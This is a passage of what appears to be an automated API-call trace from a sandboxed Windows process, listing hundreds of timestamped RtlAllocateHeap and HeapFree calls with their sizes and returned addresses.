Flags=0x0, Size=0x13200) returned 0x64d0f0 [0077.853] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1e90080 [0077.854] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x68) returned 0x578d80 [0077.854] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580b80 | out: hHeap=0x570000) returned 1 [0077.854] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1ea3290 [0077.855] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1eb64a0 [0077.855] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1ec96b0 [0077.855] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1edc8c0 [0077.856] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x98) returned 0x5750b0 [0077.856] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d80 | out: hHeap=0x570000) returned 1 [0077.856] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1eefad0 [0077.856] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f02ce0 [0077.857] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f15ef0 [0077.857] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f29100 [0077.858] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f3c310 [0077.858] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f4f520 [0077.858] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe0) returned 0x574ce0 [0077.858] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5750b0 | out: hHeap=0x570000) returned 1 [0077.858] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f62730 [0077.859] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2060080 [0077.860] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2073290 [0077.860] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20864a0 [0077.860] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20996b0 [0077.861] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20ac8c0 [0077.861] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20bfad0 [0077.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20d2ce0 [0077.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20e5ef0 [0077.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x150) returned 0x57b0b0 [0077.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574ce0 | out: hHeap=0x570000) returned 1 [0077.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20f9100 [0077.863] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x210c310 [0077.863] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x211f520 [0077.863] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2132730 [0077.864] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2145940 [0077.864] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2158b50 [0077.865] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x216bd60 [0077.865] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x217ef70 [0078.020] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2192180 [0078.020] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21a5390 [0078.021] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21b85a0 [0078.021] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21cb7b0 [0078.021] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21de9c0 [0078.022] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21f1bd0 [0078.022] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1f8) returned 0x588910 [0078.022] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b0b0 | out: hHeap=0x570000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2204de0 [0078.022] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2217ff0 [0078.023] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x222b200 [0078.023] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x223e410 [0078.023] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2260080 [0078.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2273290 [0078.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22864a0 [0078.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22996b0 [0078.026] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22ac8c0 [0078.026] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22bfad0 [0078.026] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22d2ce0 [0078.026] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22e5ef0 [0078.027] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22f9100 [0078.027] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x230c310 [0078.028] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x231f520 [0078.028] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2332730 [0078.028] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2345940 [0078.029] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2358b50 [0078.029] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x236bd60 [0078.029] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x237ef70 [0078.031] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2392180 [0078.031] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2f0) returned 0x588b10 [0078.031] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0078.032] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23a5390 [0078.032] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23b85a0 [0078.032] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23cb7b0 [0078.033] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23de9c0 [0078.033] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23f1bd0 [0078.034] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2404de0 [0078.034] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2417ff0 [0078.034] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x242b200 [0078.035] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x243e410 [0078.035] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2451620 [0078.036] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2464830 [0078.036] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2477a40 [0078.037] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x248ac50 [0078.037] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x249de60 [0078.038] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24b1070 [0078.038] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24c4280 [0078.038] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24d7490 [0078.039] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24ea6a0 [0078.039] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24fd8b0 [0078.039] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2510ac0 [0078.040] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2523cd0 [0078.040] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2536ee0 [0078.041] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x254a0f0 [0078.041] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x255d300 [0078.042] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2570510 [0078.042] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2583720 [0078.042] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2596930 [0078.043] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25a9b40 [0078.043] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25bcd50 [0078.043] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25cff60 [0078.044] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25e3170 [0078.044] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x468) returned 0x59c5f0 [0078.044] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588b10 | out: hHeap=0x570000) returned 1 [0078.044] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25f6380 [0078.045] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2609590 [0078.045] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x261c7a0 [0078.045] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x262f9b0 [0078.046] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2642bc0 [0078.046] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2660080 [0078.047] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2673290 [0078.048] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26864a0 [0078.048] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26996b0 [0078.048] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26ac8c0 [0078.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26bfad0 [0078.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26d2ce0 [0078.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26e5ef0 [0078.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26f9100 [0078.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x270c310 [0078.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x271f520 [0078.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2732730 [0078.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2745940 [0078.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2758b50 [0078.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x276bd60 [0078.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x277ef70 [0078.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2792180 [0078.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27a5390 [0078.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27b85a0 [0078.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27cb7b0 [0078.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27de9c0 [0078.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27f1bd0 [0078.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2804de0 [0078.104] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2817ff0 [0078.104] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x282b200 [0078.105] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x283e410 [0078.112] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2851620 [0078.113] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2864830 [0078.113] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2877a40 [0078.114] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x288ac50 [0078.114] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x289de60 [0078.115] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28b1070 [0078.116] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28c4280 [0078.116] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28d7490 [0078.117] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28ea6a0 [0078.117] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28fd8b0 [0078.118] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2910ac0 [0078.118] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2923cd0 [0078.119] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2936ee0 [0078.119] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x294a0f0 [0078.120] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x295d300 [0078.120] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2970510 [0078.121] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x698) returned 0x588910 [0078.121] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c5f0 | out: hHeap=0x570000) returned 1 [0078.121] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2983720 [0078.122] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2996930 [0078.123] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29a9b40 [0078.123] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29bcd50 [0078.124] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29cff60 [0078.124] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29e3170 [0078.125] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29f6380 [0078.125] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a09590 [0078.126] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a1c7a0 [0078.126] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a2f9b0 [0078.127] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a42bc0 [0078.127] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a55dd0 [0078.128] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a68fe0 [0078.128] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a7c1f0 [0078.129] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a8f400 [0078.129] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2aa2610 [0078.130] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ab5820 [0078.130] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ac8a30 [0078.131] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2adbc40 [0078.131] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2aeee50 [0078.132] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b02060 [0078.132] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b15270 [0078.133] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b28480 [0078.134] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b3b690 [0078.134] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b4e8a0 [0078.135] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b61ab0 [0078.135] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b74cc0 [0078.135] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b87ed0 [0078.136] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b9b0e0 [0078.136] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bae2f0 [0078.137] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bc1500 [0078.137] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bd4710 [0078.137] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2be7920 [0078.138] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bfab30 [0078.139] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c0dd40 [0078.139] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c20f50 [0078.139] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c34160 [0078.140] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c47370 [0078.140] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c5a580 [0078.141] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c6d790 [0078.141] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c809a0 [0078.141] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c93bb0 [0078.142] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ca6dc0 [0078.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2cb9fd0 [0078.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ccd1e0 [0078.144] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ce03f0 [0078.144] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2cf3600 [0078.145] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d06810 [0078.145] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d19a20 [0078.145] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d2cc30 [0078.188] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d3fe40 [0078.189] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d53050 [0078.189] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d66260 [0078.190] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d79470 [0078.190] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d8c680 [0078.191] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d9f890 [0078.191] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2db2aa0 [0078.192] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2dc5cb0 [0078.192] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2dd8ec0 [0078.193] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2dec0d0 [0078.194] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2dff2e0 [0078.194] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e124f0 [0078.195] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e25700 [0078.195] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e38910 [0078.196] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e60080 [0078.197] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e73290 [0078.198] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e864a0 [0078.198] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e996b0 [0078.198] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2eac8c0 [0078.199] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ebfad0 [0078.199] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9e0) returned 0x59c5f0 [0078.199] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0078.199] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ed2ce0 [0078.200] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ee5ef0 [0078.200] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ef9100 [0078.201] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f0c310 [0078.201] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f1f520 [0078.203] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f32730 [0078.203] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f45940 [0078.204] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f58b50 [0078.204] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f6bd60 [0078.205] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f7ef70 [0078.205] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f92180 [0078.205] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2fa5390 [0078.206] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2fb85a0 [0078.206] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2fcb7b0 [0078.206] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2fde9c0 [0078.297] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c5f0 | out: hHeap=0x570000) returned 1 [0081.574] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7480 | out: hHeap=0x570000) returned 1 [0081.574] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c7280 | out: hHeap=0x570000) returned 1 [0081.574] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5da490 | out: hHeap=0x570000) returned 1 [0081.574] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ed6a0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x6008b0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x613ac0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x626cd0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x639ee0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x64d0f0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1e90080 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1ea3290 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1eb64a0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1ec96b0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1edc8c0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1eefad0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f02ce0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f15ef0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f29100 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f3c310 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f4f520 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f62730 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2060080 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2073290 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20864a0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20996b0 | out: hHeap=0x570000) returned 1 [0081.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20ac8c0 | out: hHeap=0x570000) returned 1 [0081.669] HeapFree (in: hHeap=0x570000, 